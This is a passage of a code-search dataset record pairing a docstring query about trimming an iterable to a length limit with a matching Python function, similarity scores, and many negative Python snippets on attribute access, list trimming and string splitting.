getattr(current_object, attribute)\n\n parent = getattr(current_object, \"parent\", None)\n if parent:\n command_tree.append(parent)\n\n raise exception.ArestorException(\"The %(attribute)r attribute is \"\n \"missing from the object tree.\",\n attribute=attribute)", "def getattribute(self, name):\n return self.attributes[name]", "def get(self, attrname):\n return self.__dict__['_'+attrname]", "def __call__(self, context):\r\n return getattr(context.obj, self.getAttrName(context))", "def get_value(self, obj, attr, accessor=None, default=missing_):\n accessor_func = accessor or utils.get_value\n check_key = attr if self.attribute is None else self.attribute\n return accessor_func(obj, check_key, default)", "def __getattr__(self, attr): # or does it ?\n return self.X[attr]", "def getattr_nested(obj, attributes):\n def _getattr(obj, attribute):\n return getattr(obj, attribute)\n return functools.reduce(\n _getattr, [obj] + attributes.split(\".\")\n )", "def deepgetattr(obj, attr, default = None):\n attributes = attr.split(\".\")\n for i in attributes:\n try:\n obj = getattr(obj, i)\n except AttributeError:\n if default:\n return default\n else:\n raise\n return obj", "def __get_attr_helper(self, object, field, default=None):\n # TODO: Make PR to fix this ^ bug\n if hasattr(object, field):\n return getattr(object, field)\n\n return default", "def _getattr_path(obj: Any, path: str) -> Any:\n if not path:\n return None\n\n for attr in path.split('.'):\n obj = getattr(obj, attr, None)\n return obj", "def getattr_recursive(self, name):\n all_attributes = self._get_all_attributes()\n if name in all_attributes: # attribute is present in this wrapper\n attr = getattr(self, name)\n elif hasattr(self.venv, 'getattr_recursive'):\n # Attribute not present, child is wrapper. Call getattr_recursive rather than getattr\n # to avoid a duplicate call to getattr_depth_check.\n attr = self.venv.getattr_recursive(name)\n else: # attribute not present, child is an unwrapped VecEnv\n attr = getattr(self.venv, name)\n\n return attr", "def get_attr(self, name, default=None):\n try:\n return self.managedobjectattribute_set.get(key=name).value\n except ManagedObjectAttribute.DoesNotExist:\n return default", "def get_chain(self, **kwargs):\n self._check_if_fitted()\n return self._sampler.get_chain(**kwargs)", "def get(self, att):\n return getattr(self, att)", "def test_dotwiz_plus_get_attr():\n dd = DotWizPlus()\n dd.a = [{'one': 1, 'two': {'key': 'value'}}]\n\n item = getattr(dd, 'a')[0]\n assert isinstance(item, DotWizPlus)\n assert getattr(item, 'one') == 1\n\n assert getattr(getattr(item, 'two'), 'key') == 'value'\n # alternate way of writing the above\n assert item.two.key == 'value'", "def GetAttribute(self, attr):\n return self._attrs[attr]", "def csv_getattr(obj, attr_name):\n try:\n return getattr(obj, attr_name)\n except AttributeError:\n raise AttributeError('CsvForm: No \\'{0}\\' attribute found on \\'{1}\\' object'.format(\n attr_name,\n obj._meta.object_name,\n ))", "def __getattr__(self, name, saveattr=False):\n schema_cls = object.__getattribute__(self, Schema.__name__)\n if name in schema_cls.relationships:\n v = self.fullfill_relationship(name)\n if saveattr:\n setattr(self, name, v)\n return v\n # TODO: if attribute doesn't exist, attempt to update from database\n v = object.__getattribute__(self, name)\n return v", "def rgetattr(obj, attr, default=object()):\r\n if default is object():\r\n _getattr = getattr\r\n else:\r\n def _getattr(obj, name):\r\n \"\"\" Get an attribute from Krest object\"\"\"\r\n return getattr(obj, name, default)\r\n return functools.reduce(_getattr, [obj]+attr.split('.'))", "def get_attr(self, value):\n return self.index[value]", "def chain_name(self) -> str:\n return pulumi.get(self, \"chain_name\")", "def __getattr__(self, key):\n return self.get_attribute(key)", "def __getattr__(self, attr):\r\n\t\tif (attr in ['firmware', 'vfull', 'ifull', 'lifetime']):\r\n\t\t\treturn self.issue_command (command_id=attr, ch=None, operator='?', n_lines_requested=1)[0][0]", "def getattr_recursive(self, name: str) -> Any:\n all_attributes = self._get_all_attributes()\n if name in all_attributes: # attribute is present in this wrapper\n attr = getattr(self, name)\n elif hasattr(self.venv, \"getattr_recursive\"):\n # Attribute not present, child is wrapper. Call getattr_recursive rather than getattr\n # to avoid a duplicate call to getattr_depth_check.\n attr = self.venv.getattr_recursive(name)\n else: # attribute not present, child is an unwrapped VecEnv\n attr = getattr(self.venv, name)\n\n return attr", "def get_attr(attributes, name):\n try:\n return attributes.getValue(name)\n except KeyError:\n return None", "def _get_node_attr(self, node, attr):\n return self.metrics[attr].ix[node]", "def __getattr__(self, item):\n return getattr(self.__dict__['_obj'], item)", "def __getattr__(self, attributeName):\n\n return getattr(self.__decoratedObj, attributeName)", "def mineral_attr(attribute):\n return attribute[0]", "def rget(obj, attrstr, default=None, delim='.'):\n try:\n parts = attrstr.split(delim, 1)\n attr = parts[0]\n attrstr = parts[1] if len(parts) == 2 else None\n if isinstance(obj, dict):\n value = obj[attr]\n elif isinstance(obj, list):\n value = obj[int(attr)]\n elif isinstance(obj, tuple):\n value = obj[int(attr)]\n elif isinstance(obj, object):\n value = getattr(obj, attr)\n if attrstr:\n return rget(value, attrstr, default, delim)\n return value\n except Exception:\n return default", "def attribute(self):\n return getattr(self.parent_model, self.name)", "def __getattr__(self, attr):\n return getattr(self.door, attr)", "def get_chain(self, chain):\n if not self.atom_section:\n self.read_atoms_section()\n chain_lines = []\n for at_line in self.atom_section:\n if at_line[21:22] == chain:\n chain_lines.append(at_line)\n return \"\".join(chain_lines)", "def get_chain_name (chain):\n if \"-\" in chain.id:\n id_chain=chain.id[-1]\n else:\n id_chain=chain.id\n return id_chain", "def get_attr(self, attr_type):\n attr = attr_type()\n attr.attach_to(self.get_sobj(), self._bld)\n return attr", "def get_attr_impl(context, builder, typ, value, attr):\n if attr in typ.struct:\n # It's a struct field\n inst = context.make_helper(builder, typ, value=value)\n data_pointer = inst.data\n data = context.make_data_helper(builder, typ.get_data_type(),\n ref=data_pointer)\n return imputils.impl_ret_borrowed(context, builder,\n typ.struct[attr],\n getattr(data, _mangle_attr(attr)))\n elif attr in typ.jit_props:\n # It's a jitted property\n getter = typ.jit_props[attr]['get']\n sig = templates.signature(None, typ)\n dispatcher = types.Dispatcher(getter)\n sig = dispatcher.get_call_type(context.typing_context, [typ], {})\n call = context.get_function(dispatcher, sig)\n out = call(builder, [value])\n _add_linking_libs(context, call)\n return imputils.impl_ret_new_ref(context, builder, sig.return_type, out)\n\n raise NotImplementedError('attribute {0!r} not implemented'.format(attr))", "def chain_offset(self):\n return self._chain_offset", "def attribute(self, apath):\n return data.Attribute(self, apath)", "def __get__(self,obj,objtype):\n if not obj:\n return [getattr(objtype,a) for a in self.attribs]\n else:\n return [getattr(obj,a) for a in self.attribs]", "def __getattr__(self, attr):\n return self.product.get(attr, \"\")", "def _object_with_attr(self, name):\n for obj in self._objects:\n if hasattr(obj, name):\n return obj\n\n raise AttributeError(f\"No object has attribute {name!r}\")", "def __getattr__(self, name):\n\n if name not in self._extras:\n raise AttributeError(\"'%s' object has no attribute '%s'\" %\n (self.__class__.__name__, name))\n\n return self._extras[name]", "def __getattribute__(self, name):\n klass = object.__getattribute__(self, \"__class__\")\n if not klass.RELATIONSHIP_CACHE is None and klass.RELATIONSHIP_CACHE.has_key(name):\n if object.__getattribute__(self, 'id') is None:\n raise ReferenceNotSavedError, \"Cannot get/set relationship on unsaved object\"\n relationshipKlass, args = klass.RELATIONSHIP_CACHE[name]\n return relationshipKlass(self, name, args)\n return object.__getattribute__(self, name)", "def get_attribute(self, attribute):\r\n return self.connection.get_instance_attribute(self.id, attribute)" ]
[ "0.6868703", "0.65075165", "0.6485146", "0.64567274", "0.62154573", "0.61727905", "0.61658573", "0.6000796", "0.5964722", "0.5916216", "0.5916216", "0.5876859", "0.5874207", "0.5869589", "0.5869589", "0.5850275", "0.58463216", "0.58114004", "0.5795329", "0.57904404", "0.57904404", "0.5784626", "0.5782953", "0.57762647", "0.5772085", "0.57297087", "0.57264286", "0.57264286", "0.56935185", "0.56935185", "0.5683455", "0.56617904", "0.5646825", "0.5624613", "0.5606576", "0.5605053", "0.55627364", "0.55627364", "0.5559204", "0.5536571", "0.552858", "0.5526538", "0.55236167", "0.5498105", "0.54854345", "0.54639834", "0.5462136", "0.54508865", "0.54387707", "0.5437196", "0.54325294", "0.54226613", "0.5413573", "0.53883857", "0.53821623", "0.5372915", "0.53565866", "0.5345188", "0.5343703", "0.5343333", "0.5332021", "0.53287065", "0.5319923", "0.5315137", "0.53146124", "0.5313968", "0.53058344", "0.52951026", "0.52923703", "0.52911747", "0.52832425", "0.52759707", "0.52691835", "0.5264968", "0.5260354", "0.5252481", "0.5245224", "0.5241871", "0.52338064", "0.5233353", "0.52325916", "0.52205", "0.52187747", "0.5212827", "0.5212363", "0.5199243", "0.5196592", "0.5194686", "0.5188108", "0.51837164", "0.5175585", "0.5172254", "0.5167763", "0.51546675", "0.51492023", "0.51483935", "0.5147527", "0.5136472", "0.51337165", "0.51325023" ]
0.7126414
0
trim the list to make total length no more than limit.If split specified,a string is return.
def trim_iterable(iterable, limit, *, split=None, prefix='', postfix=''): if split is None: sl = 0 join = False else: sl = len(split) join = True result = [] rl = 0 for element in iterable: element = prefix + element + postfix el = len(element) if len(result) > 0: el += sl rl += el if rl <= limit: result.append(element) else: break if join: result = split.join(result) return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def trim(self, input_words_list):\n def to_be_trimmed(x):\n if len(x) < 3:\n return False\n else:\n return True\n self.trimmed_words_list = list(filter(to_be_trimmed, input_words_list))\n # print('the filtered words are:')\n # for word in trimmed_words_list:\n # print(word)\n return self.trimmed_words_list", "def soar_trimlist(org_list):\n if not isinstance(org_list, list):\n return org_list\n return [element.strip() for element in org_list]", "def ltrim1 (l,proportiontocut,tail='right'):\r\n if tail == 'right':\r\n lowercut = 0\r\n uppercut = len(l) - int(proportiontocut*len(l))\r\n elif tail == 'left':\r\n lowercut = int(proportiontocut*len(l))\r\n uppercut = len(l)\r\n return l[lowercut:uppercut]", "def trimlist(self, iplist, maxIPs = 3):\n \n if len(iplist) > 0:\n iplist = iplist[:maxIPs:]\n return iplist\n else:\n print(\"Error: No IP A-records found.\")\n return None", "def ltrimboth (l,proportiontocut):\r\n lowercut = int(proportiontocut*len(l))\r\n uppercut = len(l) - lowercut\r\n return l[lowercut:uppercut]", "def repair_size_list(self, str_val):\n return [word for word in str_val[2:-2].split('\\', \\'')]", "def limit(st,length):\n return st[:length]", "def test_trim(self):\n s1 = 'esrdctfvubfiqisqwduonq'\n assert lws.trim(s1, 5) == 'esrdc...'\n assert lws.trim(s1, 20) == 'esrdctfvubfiqisqwduo...'\n s2 = 'asdasdasd'\n assert lws.trim(s2) == 'asdasdasd'", "def _rsplit(value, sep, maxsplit=None):\n\tstr_parts = value.split(sep)\n\tif (maxsplit is not None) and (len(str_parts) > 1):\n\t\treturn [str.join(sep, str_parts[:-maxsplit])] + str_parts[-maxsplit:]\n\treturn str_parts", "def split(self, sep=None, maxsplit=None):\n return split(self, sep, maxsplit)", "def clean_tag(elmt_with_commas, max_lenght):\r\n elmt_list = elmt_with_commas.split(\",\")\r\n elmt_list = [e.strip() for e in elmt_list if len(e) < max_lenght]\r\n return elmt_list", "def dividir(l):\n\n\ta = []\n\tfor i in range(len(l)):\n\t\ta += l[i].split(' ')\n\treturn a[:100]", "def trim_to_upper_length_limit(self) -> None:\n self.trim_utils.lang_model = self.config['language_model']\n\n dataframe_splits = np.array_split(self.data, self.n_cores)\n pool = Pool(self.n_cores)\n self.data = pd.concat(pool.map(self.trim_text_for_dataframe, dataframe_splits))\n pool.close()\n pool.join()", "def check_list(list_obj, limit):\r\n if len(list_obj) > limit:\r\n num_of_lists = int(len(list_obj) / limit) + 1\r\n sublist = []\r\n k = 0\r\n while k < num_of_lists:\r\n x = list_obj[limit*k:limit*(k+1)]\r\n sublist.append(x)\r\n k += 1\r\n\r\n return sublist\r\n\r\n return list_obj", "def _truncate(self):\n dif = len(self) - self._maxLen\n if dif > 0:\n #return\n self[:dif] = []", "def split(self) -> List[String]:\n pass", "def trim_items(self, val):\n self.order_items = self.order_items[:val]", "def listsplit(value, arg):\n\n print \"listsplit:{0}\".format(arg)\n args = arg.split(\",\")\n if not len(args) == 2:\n return value\n\n i = int(args[0])\n n = int(args[1])\n\n m = len(value)\n\n base = m // n\n rem = m % n\n\n sizes = [base + 1] * rem + [base] * (n - rem)\n\n start = sum(sizes[0:i])\n end = start + sizes[i]\n\n return value[start:end]", "def truncate(x: str, limit: int) -> str:\n return \" \".join(x.split()[:limit])", "def explode(delim, val, limit = None): \n if limit != None:\n return val.split(delim, limit)\n else:\n return val.split(delim)", "def trim(self, start, end):", "def split_message(message, max_length):\n ms = []\n while len(message) > max_length:\n ms.append(message[:max_length])\n message = message[max_length:]\n ms.append(message)\n return ms", "def trimmedLength(self):\r\n\t\treturn (self.sourceLength - (self.trimEnd + self.trimStart))", "def splitter(self, lts, size, res=\"l\"):\n if res == \"l\":\n new_list = [lts[i:i + size] for i in range(0, len(lts), size)]\n elif res == \"s\":\n new_list = [\",\".join(lts[i:i + size])\n for i in range(0, len(lts), size)]\n\n return new_list", "def _FixLongList(self, long_list, chunk_size):\n split_list = []\n length = len(long_list)\n if length > chunk_size:\n list_size = chunk_size - 1\n pages, mod = divmod(length, list_size)\n if mod:\n pages += 1\n for page in range(pages):\n split_list.append(long_list[list_size * page:list_size * (page+1)])\n else:\n split_list.append(long_list)\n return split_list", "def _clean_list(self, items):\n itemlist = list(filter(None, items))\n if len(itemlist) < 3:\n itemlist.append(\"\")\n return itemlist\n\n return itemlist", "def __string_splitter(self, arr, string, split_length):\n if len(string) < split_length:\n arr.append(string)\n return arr\n else:\n arr.append(string[:split_length])\n return self.__string_splitter(arr, string[split_length:], split_length)", "def split(self, string, maxsplit=MAX_INT, include_separators=False):\n return self._split(\n string, maxsplit=maxsplit, include_separators=include_separators\n )", "def rsplit(self, sep=None, maxsplit=None):\n return rsplit(self, sep, maxsplit)", "def rsplit(self) -> List[String]:\n pass", "def split_text_by_max_size(text, max_size, split_token, is_list=False):\n # list of text sub strings of maximum length of max_size\n text_parts_list = list()\n # assuming sentences in text are divided by split token\n if is_list:\n sentence_list = split_list_by_token(text, split_token)\n else:\n sentence_list = text.split(split_token)\n\n # current part of text to concatenate sentences\n current_part = variable_initializer(is_list)\n\n # length of current part\n current_part_len = 0\n while sentence_list:\n # take next sentence\n current_sentence = sentence_list.pop(0)\n # check if empty string\n if len(current_sentence) == 0:\n continue\n # length of current sentence\n if is_list:\n current_sentence_tokens_count = len(current_sentence)\n else:\n current_sentence_tokens_count = len(current_sentence.split(' '))\n if current_part_len + current_sentence_tokens_count <= max_size:\n current_part = current_part + current_sentence\n current_part_len += current_sentence_tokens_count\n else:\n # insert last legitimate part\n text_parts_list.append(current_part) if current_part_len > 0 else None\n # check that current sentence is in legitimate length\n if len(current_sentence) <= max_size:\n # update incremental part with last legitimate length of current sentence\n current_part = current_sentence # TODO: debug with string and with long comments, make sure doesnt loose parts in the middle\n current_part_len = current_sentence_tokens_count\n else:\n # split current sentence to valid lengths\n num_split = math.ceil(len(current_sentence) / max_size)\n splited_current_sentence = [l.tolist() for l in np.array_split(current_sentence, num_split)]\n text_parts_list += splited_current_sentence\n current_part = variable_initializer(is_list)\n current_part_len = 0\n # in case entire text never crossed max_size or last part didn't..\n if current_part in text_parts_list:\n return text_parts_list\n else:\n text_parts_list.append(current_part) if current_part_len > 0 else None\n return text_parts_list", "def trim(self, val, collections=None):\n \n if isinstance(val, str):\n val = int(val)\n \n if collections is None:\n self.img_lst = self.img_lst[:val]\n else:\n new_imgs = []\n for c in collections:\n imgs = [img for img in self.img_lst if img.get_metadata()\\\n ['collectionId'] == c]\n if len(imgs) < val:\n new_imgs += imgs\n else:\n new_imgs += imgs[:val]\n \n self.img_lst = new_imgs", "def __trim(self, f, m, l, template, delim='{'):\n for item in [(delim + e) for e in template.split(delim) if e]:\n # Check if use specifies length > Look for '}[#]'\n if re.search(\"}\\[[-]?[0-9]+\\]\", item):\n trim = int(re.search(\"\\[([-]?[0-9]+)\\]\", item).group(1))\n name = re.search(\"\\{(.+)\\}\", item).group(1)\n\n if name in [\"first\", \"f\"]:\n f = f[:trim]\n\n elif name in [\"middle\", \"m\"]:\n m = m[:trim]\n\n elif name in [\"last\", \"l\"]:\n l = l[:trim]\n\n return (f, m, l)", "def question_15(list_str: str) -> str:\n return max(list_str, key=len)", "def pickTrimString(trimChannels, length, maxTrim):\n if (trimChannels=='auto'):\n trimString = 'auto_max=%g' % pickAutoTrimChannels(length, maxTrim)\n else:\n trimString = '%g' % trimChannels\n return(trimString)", "def rsplit(self, by=None, maxsplit=-1):\n res = []\n end = len(self)\n drop_spaces = by is None\n if drop_spaces:\n by = \" \"\n bylen = len(by)\n if bylen == 0:\n raise ValueError(\"empty separator\")\n\n while maxsplit != 0:\n next = self._clean_string.rfind(by, 0, end)\n if next < 0:\n break\n # Get character codes after the index as well.\n res.append(self[next + bylen : end])\n end = next\n maxsplit -= 1 # NB. if it's already < 0, it stays < 0\n\n res.append(self[:end])\n res.reverse()\n if drop_spaces:\n return [part for part in res if part != \"\"]\n return res", "def parse_trim(config):\n config['bins'] = _parse_list_of_lists(config['bins'], delimiter_elements='-', delimiter_lists=',')\n return config", "def split_list(list_in,number_of_pieces):\n output_length = len(list_in) / number_of_pieces\n output = []\n piece = []\n counter = 0\n for list_item in list_in:\n counter += 1\n piece.append(list_item)\n if counter >= output_length:\n output.append(piece)\n counter = 0\n piece = []\n # Make sure nothing is missed\n if len(piece) > 0:\n output.append(piece)\n return output", "def delimit(self):\n pass", "def pickAutoTrimChannels(length, maxTrim):\n trimChannels = 0.1\n if (length*trimChannels > maxTrim):\n casalogPost(\"pickAutoTrimChannels(): set trimChannels = %d because %.0f > %d\" % (maxTrim,length*trimChannels,maxTrim))\n trimChannels = maxTrim\n return(trimChannels)", "def split(base_list):\n list_mid_pointer=len(base_list)//2\n return base_list[:list_mid_pointer],base_list[list_mid_pointer:]", "def ltrim(val, chars = None):\n if chars != None:\n return val.lstrip(chars)\n else:\n return val.lstrip()", "def split_list(a_list):\n half = len(a_list)/2\n return a_list[:half], a_list[half:]", "def trim(elements, n):\n if len(elements) >= n: # if there are enough elements,\n elements[:n] = True # set `n` to `True` and leave\n return elements # the rest to `False`.", "def splitListIntoContiguousListsAndTrim(channels, trimChannels=0.1, \n maxTrim=maxTrimDefault, \n maxTrimFraction=1.0, verbose=False):\n if type(trimChannels) != str:\n if (trimChannels <= 0):\n return(np.array(channels))\n length = len(channels)\n trimChannelsMode = trimChannels\n if (trimChannels == 'auto'):\n trimChannels = pickAutoTrimChannels(length, maxTrim)\n mylists = splitListIntoContiguousLists(channels)\n channels = []\n trimLimitForEdgeRegion = 3\n for i,mylist in enumerate(mylists):\n trimChan = trimChannels\n if verbose:\n print \"trimChan=%d, Checking list = \" % (trimChan), mylist\n if (trimChannels < 1):\n trimChan = int(np.ceil(len(mylist)*trimChannels))\n if verbose:\n print \"since trimChannels=%s<1; reset trimChan=%d\" % (str(trimChannels),trimChan)\n if (trimChannelsMode == 'auto' and 1.0*trimChan/len(mylist) > maxTrimFraction):\n trimChan = int(np.floor(maxTrimFraction*len(mylist)))\n if verbose:\n print \"trimChan for this window = %d\" % (trimChan)\n if (len(mylist) < 1+trimChan*2):\n if (len(mylists) == 1):\n # If there was only one list of 1 or 2 channels, then don't trim it away!\n channels += mylist[:1]\n continue\n # Limit the trimming of the edge closest to the edge of the spw to 3 channels,\n # in order to preserve bandwidth.\n if (i==0 and trimChan > trimLimitForEdgeRegion):\n if (len(mylists)==1):\n # It is the only window so limit the trim on the far edge too\n channels += mylist[trimLimitForEdgeRegion:-trimLimitForEdgeRegion]\n else:\n channels += mylist[trimLimitForEdgeRegion:-trimChan]\n elif (i==len(mylists)-1 and trimChan > trimLimitForEdgeRegion):\n channels += mylist[trimChan:-trimLimitForEdgeRegion]\n else:\n # It is not an edge window, or it is an edge window and trimChan<=3\n channels += mylist[trimChan:-trimChan]\n return(np.array(channels))", "def splitnstrip(self, string, symbol=\":\", maxsplit=1):\n if symbol not in string:\n return None\n\n return self.stripall(string.split(symbol, maxsplit))", "def getSpaceTokenList(token, listSEs, jobCloud, analysisJob, fileListLength, si, alt=False):\n\n # check if there are any space tokens\n if token == [''] and fileListLength > 1:\n # correct length of empty list\n token = token*fileListLength\n tolog(\"Corrected length of empty space token list from 0 to %d\" % len(token))\n\n # no space tokens for tier 3s\n if not si.isTier3():\n token_list = getProperSpaceTokenList(token, listSEs, jobCloud, analysisJob, alt=alt)\n else:\n token_list = None\n\n return token_list", "def split(mylist,size):\r\n\r\n split_list = []\r\n\r\n for index,num in enumerate(mylist):\r\n if index + size <= len(mylist):#checks so we don't go out of list range\r\n position = mylist.index(num,index)\r\n split_list.append(mylist[position:position+size])\r\n return split_list", "def trim_items(self, max_images):\n \n if max_images is not None:\n counter = int(max_images)\n for order in self.order_lst:\n items = order.get_items()\n if len(items) < counter:\n trim_val = len(items)\n order.trim_items(trim_val)\n counter -= trim_val\n else:\n order.trim_items(counter)\n counter = 0", "def break_list_to_sub_list(self, full_list, chunk_size = 45):\n if chunk_size < 1:\n chunk_size = 1\n return [full_list[i:i + chunk_size] for i in range(0, len(full_list), chunk_size)]", "def truncate(self, parts_a: List[Tuple[List[int], bool]], parts_b: List[Tuple[List[int], bool]], answer: List[int],\n max_length: int):\n total_len = self._seq_length(parts_a) + self._seq_length(parts_b)\n if answer:\n total_len += len(answer)\n total_len += num_special_tokens_to_add(\n parts_a, parts_b, answer, add_cls=True, add_sep=False, add_piece=True)\n num_tokens_to_remove = total_len - max_length\n\n if num_tokens_to_remove <= 0:\n return False\n\n for _ in range(num_tokens_to_remove):\n if self._seq_length(parts_a, only_shortenable=True) > self._seq_length(parts_b, only_shortenable=True):\n self._remove_last(parts_a)\n else:\n self._remove_last(parts_b)\n return True", "def limit(requestContext, seriesList, n):\n return seriesList[0:n]", "def ltrim(self, name, start, end):\n self.connect()\n self._write('LTRIM %s %s %s\\r\\n' % (name, start, end))\n return self._get_simple_response()", "def split_lod_by_char(lod, max_chars=10000000):\n max_chars = min(max_chars, SF_BULK_MAX_CHAR)\n num_char_item = []\n for item in lod:\n num_char_item.append(num_char([item]))\n num_char_item_cumm = list(np.cumsum(num_char_item))\n x = num_char_item_cumm.copy()\n splited = []\n last = 0\n for i in range(0, len(x) - 1):\n if x[i + 1] > max_chars:\n # print(x[i+1], x[i],i)\n x[i + 1:] = list(np.add(x[i + 1:], [-x[i]] * len(x[i + 1:])))\n x[:i + 1] = [0] * len(x[:i + 1])\n splited.append(lod[last:i + 1])\n last = i + 1\n # print('x depois:',x)\n if last <= len(x):\n splited.append(lod[last:len(x)])\n return splited", "def Split(ar, size):\r\n return [ar[i:i + size] for i in range(0, len(ar), size)]", "def question_16(list_str: str) -> str:\n return min(list_str, key=len)", "def split_list(l, ratio=0.75):\n i = int(ratio * len(l))\n return l[:i], l[i:]", "def trimsplit(args):\n from jcvi.utils.cbook import SummaryStats\n\n p = OptionParser(trimsplit.__doc__)\n p.add_option(\n \"--minlength\", default=1000, type=\"int\", help=\"Min length of contigs to keep\"\n )\n opts, args = p.parse_args(args)\n\n if len(args) != 1:\n sys.exit(not p.print_help())\n\n (fastafile,) = args\n minlength = opts.minlength\n\n fw = must_open(fastafile.rsplit(\".\", 1)[0] + \".split.fasta\", \"w\")\n ntotal = 0\n removed = []\n Ns = []\n for name, seq in parse_fasta(fastafile):\n stretches = []\n ntotal += len(seq)\n for lower, stretch in groupby(seq, key=lambda x: x.islower()):\n stretch = \"\".join(stretch)\n if lower or len(stretch) < minlength:\n removed.append(len(stretch))\n continue\n for isN, s in groupby(stretch, key=lambda x: x in \"Nn\"):\n s = \"\".join(s)\n if isN or len(s) < minlength:\n Ns.append(len(s))\n continue\n stretches.append(s)\n for i, seq in enumerate(stretches):\n id = \"{0}_{1}\".format(name.split(\"|\")[0], i)\n s = SeqRecord(Seq(seq), id=id, description=\"\")\n SeqIO.write([s], fw, \"fasta\")\n fw.close()\n\n # Reporting\n if removed:\n logging.debug(\n \"Total bases removed: {0}\".format(percentage(sum(removed), ntotal))\n )\n print(SummaryStats(removed), file=sys.stderr)\n if Ns:\n logging.debug(\"Total Ns removed: {0}\".format(percentage(sum(Ns), ntotal)))\n print(SummaryStats(Ns), file=sys.stderr)", "def _split_input_list(str_list):\r\n\r\n new_list = re.split(r'[\\n\\r\\s,]', str_list)\r\n new_list = [s.strip() for s in new_list]\r\n new_list = [s for s in new_list if s != '']\r\n\r\n return new_list", "def testSplit(self):\n\n s = StrObject(u\"first second\")\n result = s.call(u\"split\", [StrObject(u\" \")])\n pieces = [obj._s for obj in unwrapList(result)]\n self.assertEqual(pieces, [u\"first\", u\"second\"])", "def split(self, by=None, maxsplit=-1):\n drop_spaces = by is None\n if drop_spaces:\n by = \" \"\n\n bylen = len(by)\n if bylen == 0:\n raise ValueError(\"empty separator\")\n\n res = []\n start = 0\n while maxsplit != 0:\n next = self._clean_string.find(by, start)\n if next < 0:\n break\n # Get character codes after the index as well.\n res.append(self[start:next])\n start = next + bylen\n maxsplit -= 1 # NB. if it's already < 0, it stays < 0\n\n res.append(self[start : len(self)])\n if drop_spaces:\n return [part for part in res if part != \"\"]\n return res", "def trim(args) :\n from trimmer import trim_reads\n trim_reads(args)", "def five(ls):\n return ls[:5]", "def remove_shorts(word_list, minimum_length):\n\tworking_word_list = []\n\tfor word in word_list:\n\t\tif len(word) >= minimum_length:\n\t\t\tworking_word_list.append(word)\n\treturn working_word_list", "def _chunk_list(list_to_chunk, chunk_length):\n return [list_to_chunk[i:i+max(1, chunk_length)] for i in range(0, len(list_to_chunk), max(1, chunk_length))]", "def setSplitLength(self, value):\n return self._set(splitLength=value)", "def ghetto_split(list_, chunk_size=100):\n logging.debug(f\"Splitting list of {len(list_)} length, chunk size = {chunk_size}\")\n split_lists = []\n for i in range(0,len(list_),chunk_size):\n split_lists.append(list_[i:i+chunk_size])\n logging.debug(f\"List has been split into {len(split_lists)} lists. Total num of elements in split lists is {sum([len(i) for i in split_lists])}\")\n return split_lists", "def split_array(array, max_len=2000):\n new_array_lst = []\n for x in range(0, len(array), max_len):\n split = array[x: x + max_len]\n if len(split) >= max_len:\n new_array_lst.append(split)\n\n return new_array_lst", "def split_string(source,splitlist):\n\tspaces = \" \" * len(splitlist)\n\ttranstable = string.maketrans(splitlist, spaces)\n\tsource = string.translate(source, transtable)\n\treturn source.split()", "def cut_in_words(self,linea):\n length = 0\n res = ''\n limit_screen = 30\n for word in linea.split(' '):\n if length + len(word) <= limit_screen:\n new_word = word + ' '\n length += len(new_word)\n else:\n new_word = '\\n' + word + ' '\n length = len(new_word) - 2 #-2 para no tener en cuenta el \\n\n res += new_word\n return res", "def hard_words(a_list):\n\n return [word for word in a_list if len(word) > 7]", "def __size_restriction_correct_string_list(self):\n\n strTestName = 'String size higher or equal to the size of a list (correct)'\n RxCSObject = _RxCSobject()\n\n # Firstly, let us define a reference parameter\n RxCSObject.paramAddMan('lRefParameter1', 'List ref. parameter')\n RxCSObject.paramType('lRefParameter1', list)\n\n # Now, let me define a string\n RxCSObject.paramAddMan('parameter1', 'String parameter')\n RxCSObject.paramType('parameter1', str)\n RxCSObject.paramSizHE('parameter1', 'lRefParameter1')\n\n RxCSObject.lRefParameter1 = [4, 5, 8, 9]\n RxCSObject.parameter1 = 'abbce'\n\n self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def cut_in_lines(self,line):\n limit_screen = 30 #caracteres que tiene de ancho la pantalla\n length = 0 #para comparar leineas\n res = ''\n\n for linea in line.split('\\n'):\n if length + len(linea) <= limit_screen:\n new_linea = linea\n length += len(new_linea)\n else:\n if len(linea) > limit_screen:\n linea = self.cut_in_words(linea)\n new_linea = '\\n' + linea\n length = len(new_linea) - 2 #-2 para no tener en cuenta el \\n\n res += new_linea\n return res", "def clip_string_list(a, max_len, continue_str='…'):\n return [x if len(x) <= max_len else x[:max_len - len(continue_str)] + '…' for x in a]", "def rsplit(a, sep=None, maxsplit=None):\n # This will return an array of lists of different sizes, so we\n # leave it as an object array\n return _vec_string(\n a, object_, 'rsplit', [sep] + _clean_args(maxsplit))", "def LTrim(text):\n return str(text).lstrip()", "def list_strip(line: list):\n new_line = [field.strip() for field in line]\n if new_line != line:\n tpl = \"Removed trailing whitespaces in fields of line: {}\"\n msg = tpl.format(line)\n warnings.warn(msg, ParseIsatabWarning)\n return new_line", "def split(a, sep=None, maxsplit=None):\n # This will return an array of lists of different sizes, so we\n # leave it as an object array\n return _vec_string(\n a, object_, 'split', [sep] + _clean_args(maxsplit))", "def rsplit(s, sep, maxsplits=0):\n L = s.split(sep)\n if not 0 < maxsplits <= len(L):\n return L\n return [sep.join(L[0:-maxsplits])] + L[-maxsplits:]", "def seperate_list(list, division_part):\n avg = len(list) / float(division_part)\n out = []\n last = 0.0\n\n while last < len(list):\n out.append(list[int(last):int(last + avg)])\n last += avg\n return out", "def split_lod(lod, max_items=10000, max_chars=10000000):\n if type(lod) != list:\n raise ValueError(\"{}: lod must be of type list\".format(\"split_lod\"))\n\n splited_final = []\n for splited_partial in split_lod_by_item(lod, max_items=max_items):\n splited_final.extend(\n split_lod_by_char(splited_partial, max_chars=max_chars))\n return splited_final", "def smart_split(x):\n return R_SPLIT_DELIM.split(x)", "def filter_long_words(list,n):\n numberlist=[]#set up a new list\n for i in range(0,len(list)):\n if len(list[i]) > n:#pick up the word that is longer than n\n numberlist.append(list[i])#count the length of each word\n else:\n continue\n return numberlist", "def test_sanitized_trim(self):\n value = \" sample \"\n response = clean.trim(value)\n assert response == \"sample\"\n assert type(response) == str", "def list_split(self, l1, n=1):\n if (len(l1) % n) == 0:\n m = len(l1) // n\n else:\n m = len(l1) // n + 1\n l2 = [l1[i * n:(i + 1) * n] for i in range(m)]\n return l2", "def filter_record(self, record):\n if len(record) >= self.max_length:\n return record[:self.max_length]\n else:\n return record", "def trimming(self, trimming):\n allowed_values = [\"None\", \"Character\", 